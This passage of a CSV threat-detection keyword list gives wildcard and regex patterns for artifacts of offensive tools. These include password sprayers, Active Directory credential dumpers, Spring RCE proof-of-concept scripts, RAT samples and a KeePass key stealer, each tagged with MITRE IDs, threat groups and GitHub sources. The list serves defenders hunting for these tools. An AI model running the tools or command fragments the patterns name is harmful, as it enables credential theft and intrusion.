COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","60010"
"*SpoolTrigger\SpoolTrigger.*",".{0,1000}SpoolTrigger\\SpoolTrigger\..{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","60011"
"*Spray an empty password across the Domain*",".{0,1000}Spray\san\sempty\spassword\sacross\sthe\sDomain.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","60014"
"*spray* --recon *.* -u *.txt --threads 10*",".{0,1000}spray.{0,1000}\s\-\-recon\s.{0,1000}\..{0,1000}\s\-u\s.{0,1000}\.txt\s\-\-threads\s10.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","60015"
"*Spray365.git*",".{0,1000}Spray365\.git.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","60016"
"*spray365.py*",".{0,1000}spray365\.py.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","60017"
"*spray365_results_*.json*",".{0,1000}spray365_results_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","60018"
"*Spray-AD *",".{0,1000}Spray\-AD\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","0","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","60019"
"*Spray-AD.cna*",".{0,1000}Spray\-AD\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","60020"
"*Spray-AD.dll*",".{0,1000}Spray\-AD\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","60021"
"*SprayAD.exe *",".{0,1000}SprayAD\.exe\s.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","60022"
"*Spray-AD.exe*",".{0,1000}Spray\-AD\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","60023"
"*Spray-AD.sln*",".{0,1000}Spray\-AD\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","60024"
"*Spray-AD\Spray-AD*",".{0,1000}Spray\-AD\\Spray\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","0","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","60025"
"*spraycharles analyze *",".{0,1000}spraycharles\sanalyze\s.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","60026"
"*spraycharles gen extras*",".{0,1000}spraycharles\sgen\sextras.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","60027"
"*spraycharles spray*",".{0,1000}spraycharles\sspray.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","60028"
"*sprayhound -*",".{0,1000}sprayhound\s\-.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","N/A","3","231","19","2024-12-31T08:09:37Z","2020-02-06T17:45:37Z","60029"
"*sprayhound -d *",".{0,1000}sprayhound\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60030"
"*sprayhound-master.zip*",".{0,1000}sprayhound\-master\.zip.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","N/A","3","231","19","2024-12-31T08:09:37Z","2020-02-06T17:45:37Z","60031"
"*Spraying empty passwords*",".{0,1000}Spraying\sempty\spasswords.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","60032"
"*Spraying usernames as passwords*",".{0,1000}Spraying\susernames\sas\spasswords.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","60033"
"*Spraying\*-AccountAsPassword-Users.txt*",".{0,1000}Spraying\\.{0,1000}\-AccountAsPassword\-Users\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","60034"
"*Spraying\*-Password-Users.txt*",".{0,1000}Spraying\\.{0,1000}\-Password\-Users\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","60035"
"*SprayingToolkit.git*",".{0,1000}SprayingToolkit\.git.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","60036"
"*SprayingToolkit-master*",".{0,1000}SprayingToolkit\-master.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","60037"
"*SprayingToolkit-master.zip*",".{0,1000}SprayingToolkit\-master\.zip.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","60038"
"*spraykatz*",".{0,1000}spraykatz.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","1","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","60039"
"*Spray-Passwords.ps1*",".{0,1000}Spray\-Passwords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","60040"
"*spring_framework_malicious_jar*",".{0,1000}spring_framework_malicious_jar.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","60041"
"*Spring-cloud-function-SpEL-RCE*",".{0,1000}Spring\-cloud\-function\-SpEL\-RCE.{0,1000}","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A","N/A","","N/A","","","","60042"
"*spring-core-rce*ROOT.war*",".{0,1000}spring\-core\-rce.{0,1000}ROOT\.war.{0,1000}","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","N/A","1","50","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z","60043"
"*springFramework_CVE-2022-22965_RCE.py*",".{0,1000}springFramework_CVE\-2022\-22965_RCE\.py.{0,1000}","offensive_tool_keyword","POC","SpringFramework CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE","1","0","N/A","N/A","N/A","1","75","17","2022-04-01T12:08:45Z","2022-04-01T04:51:44Z","60044"
"*SpyGate-RAT v*.exe*",".{0,1000}SpyGate\-RAT\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","60045"
"*SpyGate-RAT.exe*",".{0,1000}SpyGate\-RAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","60046"
"*Spyndicapped spy *",".{0,1000}Spyndicapped\sspy\s.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","#content","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","60047"
"*spyonweb-get-rootdomains *",".{0,1000}spyonweb\-get\-rootdomains\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","60048"
"*spysecdump*",".{0,1000}spysecdump.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#content","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","60049"
"*Spyware.KeeThief*",".{0,1000}Spyware\.KeeThief.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#Avsignature","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","60050"
"*SQ17H1N6(*",".{0,1000}SQ17H1N6\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","60051"
"*sql_persister.py*",".{0,1000}sql_persister\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","60052"
